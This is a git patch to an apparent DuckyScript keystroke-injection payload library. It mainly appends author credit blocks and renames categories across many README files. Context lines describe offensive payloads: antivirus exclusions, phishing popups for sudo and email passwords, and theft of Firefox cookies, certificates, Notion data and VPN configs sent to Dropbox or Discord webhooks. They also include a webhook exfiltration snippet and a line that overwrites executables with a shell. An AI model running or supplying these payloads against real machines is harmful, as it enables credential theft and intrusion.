From 02c6e572b9e57a3659c7848a60d1bb5a3c723c46 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Sat, 17 Jun 2023 00:12:47 +0200 Subject: [PATCH] Update completed --- .../README.md | 32 +++++++++++++++-- .../payload.txt | 2 +- .../execution/ChangeGitRemoteLink/README.md | 30 +++++++++++++++- .../ChangeMacAddress_Linux/README.md | 34 ++++++++++++++++--- .../README.md | 34 ++++++++++++++++--- .../Change_Windows_User_Name/README.md | 30 +++++++++++++++- .../README.md | 30 +++++++++++++++- .../CloseAllApplicationsInWindows/README.md | 32 ++++++++++++++--- .../README.md | 30 +++++++++++++++- .../ExploitingAnExecutableFile/README.md | 34 ++++++++++++++++--- .../README.md | 30 +++++++++++++++- .../SendEmailThroughThunderbird/README.md | 30 +++++++++++++++- .../execution/SendMessagesInTeams/README.md | 28 +++++++++++++++ .../SendTelegramMessages_Linux/README.md | 32 ++++++++++++++--- .../README.md | 30 +++++++++++++++- .../README.md | 30 +++++++++++++++- .../README.md | 32 +++++++++++++++-- .../payload.txt | 2 +- .../README.md | 28 +++++++++++++++ .../execution/UninstallSignal/README.md | 28 +++++++++++++++ .../README.md | 32 +++++++++++++++-- .../payload.txt | 2 +- .../README.md | 30 +++++++++++++++- .../README.md | 28 +++++++++++++++ .../ExfiltrateLinuxLogFiles/README.md | 28 +++++++++++++++ .../README.md | 30 +++++++++++++++- .../ExfiltratePhotosThroughShell/README.md | 28 +++++++++++++++ .../ExfiltrateProcessInfo_Linux/README.md | 30 +++++++++++++++- .../ExfiltrateProcessInfo_Windows/README.md | 30 +++++++++++++++- .../README.md | 30 +++++++++++++++- .../README.md | 30 +++++++++++++++- .../Export_Cookies_From_Firefox/README.md | 30 +++++++++++++++- .../README.md | 30 +++++++++++++++- .../README.md | 30 +++++++++++++++- .../exfiltration/ProtonVPN-config/README.md | 27 +++++++++++++++ .../README.md | 30 +++++++++++++++- .../exfiltration/Windows-netstat/README.md | 26 ++++++++++++++ .../README.md | 34 ++++++++++++++++--- .../StandardPhishingCampaign_Linux/README.md | 30 +++++++++++++++- .../README.md | 30 +++++++++++++++- .../ChangeDesktopWallpaper_LinuxKDE/README.md | 32 ++++++++++++++--- .../README.md | 28 ++++++++++++++- .../Continuos_Print_In_Terminal/README.md | 28 +++++++++++++-- .../Follow_Someone_On_Instagram/README.md | 30 +++++++++++++++- .../prank/Full-ScreenBannerJoke/README.md | 32 ++++++++++++++--- .../prank/Full-ScreenBannerJoke/payload.txt | 2 +- .../prank/The_Mouse_Moves_By_Itself/README.md | 28 +++++++++++++++ .../library/prank/Try_To_Catch_Me/README.md | 30 +++++++++++++++- 48 files changed, 1262 insertions(+), 71 deletions(-) diff --git a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md index b994cca..8a65b7a 100644 --- a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md +++ b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md @@ -2,7 +2,7 @@ This script can be used to put an arbitrary exception path in the Avast app. -**Category**: Execute +**Category**: Execution ## Description @@ -21,4 +21,32 @@ DEFINE FULL-PATH example/to/path ### Dependencies -* The target must have **Avast installed** and **configured** on the machine \ No newline at end of file +* The target must have **Avast installed** and **configured** on the machine + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt index 6dc8394..1a88572 100644 --- a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt +++ b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt @@ -3,7 +3,7 @@ REM # | REM # Title : Add An Exception To Avast Antivirus | REM # Author : Aleff | REM # Version : 1.0 | -REM # Category : Execute | +REM # Category : Execution | REM # Target : Windows 10/11 | REM # | REM ######################################################## diff --git a/payloads/library/execution/ChangeGitRemoteLink/README.md b/payloads/library/execution/ChangeGitRemoteLink/README.md index 35c0bbb..32f9e6e 100644 --- a/payloads/library/execution/ChangeGitRemoteLink/README.md +++ b/payloads/library/execution/ChangeGitRemoteLink/README.md @@ -54,4 +54,32 @@ To make it easier to use below you can find the various tested configurations, a - REM Define the branch of the new repository Repository2, i.e. "main" ```DuckyScript DEFINE #BRANCH example -``` \ No newline at end of file +``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/ChangeMacAddress_Linux/README.md b/payloads/library/execution/ChangeMacAddress_Linux/README.md index 8567288..b51ca23 100644 --- a/payloads/library/execution/ChangeMacAddress_Linux/README.md +++ b/payloads/library/execution/ChangeMacAddress_Linux/README.md @@ -18,11 +18,35 @@ Opens a shell, get the network card name, set the new MAC address, erase traces. * Linux Permissions * Internet Connection -### Executing program - -* Plug in your device - ### Settings * Set the sudo password -* Change as you want the new MAC address \ No newline at end of file +* Change as you want the new MAC address + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md b/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md index 9fb6564..cba316c 100644 --- a/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md +++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md @@ -17,11 +17,35 @@ Opens a shel, get the network card name, set the network configuration, erase tr * Linux Permissions -### Executing program - -* Plug in your device - ### Settings * Set the sudo password -* Change as you want the network configuration \ No newline at end of file +* Change as you want the network configuration + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Change_Windows_User_Name/README.md b/payloads/library/execution/Change_Windows_User_Name/README.md index 8414e3a..9d32dcf 100644 --- a/payloads/library/execution/Change_Windows_User_Name/README.md +++ b/payloads/library/execution/Change_Windows_User_Name/README.md @@ -18,4 +18,32 @@ It is absurd that you can do so many things on windows without asking for permis ```DuckyScript DEFINE NEW_NAME example -``` \ No newline at end of file +``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Change_the_password_of_the_windows_user/README.md b/payloads/library/execution/Change_the_password_of_the_windows_user/README.md index 87c279a..21f6e2e 100644 --- a/payloads/library/execution/Change_the_password_of_the_windows_user/README.md +++ b/payloads/library/execution/Change_the_password_of_the_windows_user/README.md @@ -25,4 +25,32 @@ It is always very fascinating to see how many things you can do on Windows syste ![](docs/2.png) - `STRINGLN Get-ExecutionPolicy -List` -![](docs/3.png) \ No newline at end of file +![](docs/3.png) + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md index 5ea11cf..c02f451 100644 --- a/payloads/library/execution/CloseAllApplicationsInWindows/README.md +++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md @@ -19,10 +19,34 @@ Opens PowerShell hidden, download a Python script, execute it, remove Python scr * Internet Connection * Windows 10,11 -### Executing program - -* Plug in your device - ### Settings - No settings - Plug-And-Play + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md index 9c002fc..37ee750 100644 --- a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md +++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md @@ -33,4 +33,32 @@ DEFINE PATH_TO_DESKTOP_FILE example/path - You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop ```DuckyScript DEFINE ORIGINAL_DESKTOP_FILE_NAME example -``` \ No newline at end of file +``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/ExploitingAnExecutableFile/README.md b/payloads/library/execution/ExploitingAnExecutableFile/README.md index 05a9924..243fc9d 100644 --- a/payloads/library/execution/ExploitingAnExecutableFile/README.md +++ b/payloads/library/execution/ExploitingAnExecutableFile/README.md @@ -18,10 +18,6 @@ A script used to detect all executable files in a Linux system. An executable fi * Linux system -### Executing program - -* Plug in your device - ### Settings * You can edit the content that you want to put into the executable file. @@ -29,4 +25,32 @@ A script used to detect all executable files in a Linux system. An executable fi ```Shell # You can put whatever you want into the executable file echo "/bin/sh" > "$file" -``` \ No newline at end of file +``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md index 41bae4d..2bc0445 100644 --- a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md +++ b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/README.md @@ -16,4 +16,32 @@ The script opens the Windows advanced settings via sysdm.cpl and accesses the ad ### Dependencies -* Nothing is needed, this script is Plug-And-Play <3 \ No newline at end of file +* Nothing is needed, this script is Plug-And-Play <3 + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/SendEmailThroughThunderbird/README.md b/payloads/library/execution/SendEmailThroughThunderbird/README.md index ba9d33f..346616f 100644 --- a/payloads/library/execution/SendEmailThroughThunderbird/README.md +++ b/payloads/library/execution/SendEmailThroughThunderbird/README.md @@ -45,4 +45,32 @@ DELAY 4000 - Receiver email address - Email Subject -- Email Message \ No newline at end of file +- Email Message + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/SendMessagesInTeams/README.md b/payloads/library/execution/SendMessagesInTeams/README.md index e584e52..42aa886 100644 --- a/payloads/library/execution/SendMessagesInTeams/README.md +++ b/payloads/library/execution/SendMessagesInTeams/README.md @@ -22,3 +22,31 @@ Open a PowerShell, stop Teams if is runned, run Teams, run new message function, ### Settings - Setup the receiver + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/SendTelegramMessages_Linux/README.md b/payloads/library/execution/SendTelegramMessages_Linux/README.md index fe56884..3e87484 100644 --- a/payloads/library/execution/SendTelegramMessages_Linux/README.md +++ b/payloads/library/execution/SendTelegramMessages_Linux/README.md @@ -17,11 +17,35 @@ Opens a shell, runs the telegram-desktop app, search the user by the id, enter i * Internet Connection * telegram-desktop installed and activated -### Executing program - -* Plug in your device - ### Settings - Telegram username - Messages + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/README.md b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/README.md index e9eae65..8311849 100644 --- a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/README.md +++ b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/README.md @@ -28,4 +28,32 @@ Open the GUI interface and trough this one open the Discord app, then use the ke - This depends on the power of the computer and whether there are upgrades to be done - `[27] DELAY 6000` \ No newline at end of file + `[27] DELAY 6000` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md index 65e5e2f..d643bae 100644 --- a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md +++ b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md @@ -15,4 +15,32 @@ The script open the settings, then go to network settings, then go to wi-fi sett ```DuckyScript REM DNS IPv4 like Cloudflare DNS 1.1.1.1 DEFINE DNS example -``` \ No newline at end of file +``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md index d12df5a..36a7e2a 100644 --- a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md +++ b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md @@ -2,7 +2,7 @@ This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine. -**Category**: Execute +**Category**: Execution ## Description @@ -27,4 +27,32 @@ It is important to note that running PowerShell with administrator privileges in ![](docs/2.png) - `STRINGLN Get-ExecutionPolicy -List` -![](docs/3.png) \ No newline at end of file +![](docs/3.png) + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt index 5425348..0279e84 100644 --- a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt +++ b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt @@ -3,7 +3,7 @@ REM # REM # Title : Starting a PowerShell with administrator permissions in Windows | REM # Author : Aleff | REM # Version : 1.0 | -REM # Category : Execute | +REM # Category : Execution | REM # Target : Windows 10-11 | REM # | REM #################################################################################### diff --git a/payloads/library/execution/Stop_A_Single_Process_In_Windows/README.md b/payloads/library/execution/Stop_A_Single_Process_In_Windows/README.md index b514ca0..a2e8fe6 100644 --- a/payloads/library/execution/Stop_A_Single_Process_In_Windows/README.md +++ b/payloads/library/execution/Stop_A_Single_Process_In_Windows/README.md @@ -19,3 +19,31 @@ This script open the Task Manager app, then go to search bar, then write the pro - Write the name of the process that you want to stop `DEFINE PROCESS_NAME example` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/UninstallSignal/README.md b/payloads/library/execution/UninstallSignal/README.md index cd4cfd3..4711867 100644 --- a/payloads/library/execution/UninstallSignal/README.md +++ b/payloads/library/execution/UninstallSignal/README.md @@ -18,3 +18,31 @@ Open a PowerShell, stop the Signal proccess if it runs and then execute the unin ## Settings - Nothing to set, this payload is Plug-And-Play <3 + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md index d4cf289..4aafdfb 100644 --- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md +++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md @@ -2,7 +2,7 @@ This script can be used to uninstall a specific app on a Windows System. -**Category**: Execute +**Category**: Execution ## Description @@ -22,4 +22,32 @@ In addition to legal implications, **unauthorized removal of an application can ```DuckyScript DEFINE APP_NAME example - ``` \ No newline at end of file + ``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt index 245ade4..dc511b0 100644 --- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt +++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt @@ -3,7 +3,7 @@ REM # REM # Title : Uninstall A Specific App On Windows Through Control Panel | REM # Author : Aleff | REM # Version : 1.0 | -REM # Category : Execute | +REM # Category : Execution | REM # Target : Windows 10/11 | REM # | REM ############################################################################## diff --git a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md index 5dbca9a..94adbeb 100644 --- a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md +++ b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md @@ -31,4 +31,32 @@ To do the exfiltration I decided to use another discord webhook but of course yo - The open time may vary depending on the pc and whether there may be updates that need to be done - `DELAY 6000` \ No newline at end of file + `DELAY 6000` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md index 2d8078a..c300a05 100644 --- a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md @@ -30,3 +30,31 @@ Opens a shel, zip all zippable (R permission) content of the folder, send the zi * Set your dropbox access token * Set the folder path interessed (i.e. /Documents) * Change (if you think that it is necessary) the delay of the zipping operation + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md index 1ea1e56..8a483cd 100644 --- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md +++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md @@ -31,3 +31,31 @@ Opens a shel, zip all zippable (R permission) content of the log folder, send th * Set your dropbox access token * Change if needed the folder path interessed (i.e. /var/log) * Change (if you think that it is necessary) the delay of the zipping operation + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md index db8dadb..72eb4c0 100644 --- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md @@ -24,4 +24,32 @@ Opens a shell, get the network card name, get the network configuration using nm ### Settings -* Set the Dropbox token \ No newline at end of file +* Set the Dropbox token + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md index f952878..6dbfdef 100644 --- a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md @@ -54,3 +54,31 @@ REM DELAY 5000 REM DELAY Based On Internet Power DELAY 4000 ``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md index 78c32e5..35c0b28 100644 --- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md @@ -24,4 +24,32 @@ Opens a shell, get the process info, set the Discord webhook configuration, send ### Settings -* Set the Discord Webhook configuration \ No newline at end of file +* Set the Discord Webhook configuration + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md index 17fec93..c915074 100644 --- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md @@ -33,4 +33,32 @@ Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST ### Settings -* Dropbox Webhook \ No newline at end of file +* Dropbox Webhook + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/README.md b/payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/README.md index 71514f5..0e9f522 100644 --- a/payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/README.md +++ b/payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/README.md @@ -23,4 +23,32 @@ Opens a shell, get the password by a popup, send the input to a Discord webhook. ### Settings -* Set the Discord webhook \ No newline at end of file +* Set the Discord webhook + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md index d295951..0f54a5e 100644 --- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md @@ -19,4 +19,32 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no - You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. -`DEFINE DROPBOX_ACCESS_TOKEN "example"` \ No newline at end of file + `DEFINE DROPBOX_ACCESS_TOKEN "example"` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md index 0b1850e..875f3a6 100644 --- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md @@ -18,4 +18,32 @@ Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" a - You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. -`DEFINE DROPBOX_ACCESS_TOKEN "example"` \ No newline at end of file + `DEFINE DROPBOX_ACCESS_TOKEN "example"` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/README.md b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/README.md index a1d1973..ecf7635 100644 --- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/README.md +++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/README.md @@ -21,4 +21,32 @@ Open a PowerShell, go to Adobe Reader Path dinamically, then select all the pfx - You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. - `DEFINE DROPBOX_ACCESS_TOKEN "example"` \ No newline at end of file + `DEFINE DROPBOX_ACCESS_TOKEN "example"` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/README.md b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/README.md index 40f411a..5ddba3b 100644 --- a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/README.md +++ b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/README.md @@ -45,4 +45,32 @@ This script open the Firefox app, then go to downloads page and copy all, then o Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json' } - ``` \ No newline at end of file + ``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/ProtonVPN-config/README.md b/payloads/library/exfiltration/ProtonVPN-config/README.md index dba980d..59069af 100644 --- a/payloads/library/exfiltration/ProtonVPN-config/README.md +++ b/payloads/library/exfiltration/ProtonVPN-config/README.md @@ -35,3 +35,30 @@ Then it cleans up traces of what you have done after. * Invoke Get-Content for get in plaintext the ProtonVPN .config content * Invoke-WebRequest will be entered in the Run Box to send the content +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md index 3dca4d7..9411c39 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md @@ -25,4 +25,32 @@ Open a PowerShell and run the command `tree /f /a > out.txt` that permit to list - The path to check can be changed putting the full-path `tree /f /a > out.txt`. - `tree \ /f /a > out.txt` - - `tree C:\Users\Aleff\Documents /f /a > out.txt` \ No newline at end of file + - `tree C:\Users\Aleff\Documents /f /a > out.txt` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Windows-netstat/README.md b/payloads/library/exfiltration/Windows-netstat/README.md index 52a752b..e745698 100644 --- a/payloads/library/exfiltration/Windows-netstat/README.md +++ b/payloads/library/exfiltration/Windows-netstat/README.md @@ -38,4 +38,30 @@ Functions available: - proto **$p "\"** - *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".* +## Credits +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
diff --git a/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md b/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md index 99ab479..73edc76 100644 --- a/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md +++ b/payloads/library/phishing/ExfiltrateEmailAndPasswordByPhising_Linux/README.md @@ -19,10 +19,34 @@ Opens a shell, get the email and the email password by a popup, send the input t * Discord webhook * KDE/kdialog based -### Executing program - -* Plug in your device - ### Settings -* Set the Discord webhook \ No newline at end of file +* Set the Discord webhook + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingCampaign_Linux/README.md b/payloads/library/phishing/StandardPhishingCampaign_Linux/README.md index 4c97e42..1707f9e 100644 --- a/payloads/library/phishing/StandardPhishingCampaign_Linux/README.md +++ b/payloads/library/phishing/StandardPhishingCampaign_Linux/README.md @@ -187,4 +187,32 @@ This DuckyScript code performs several actions related to downloading and unzipp ```DuckyScript REM Open the login page STRINGLN xdg-open login.html; exit; -``` \ No newline at end of file +``` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
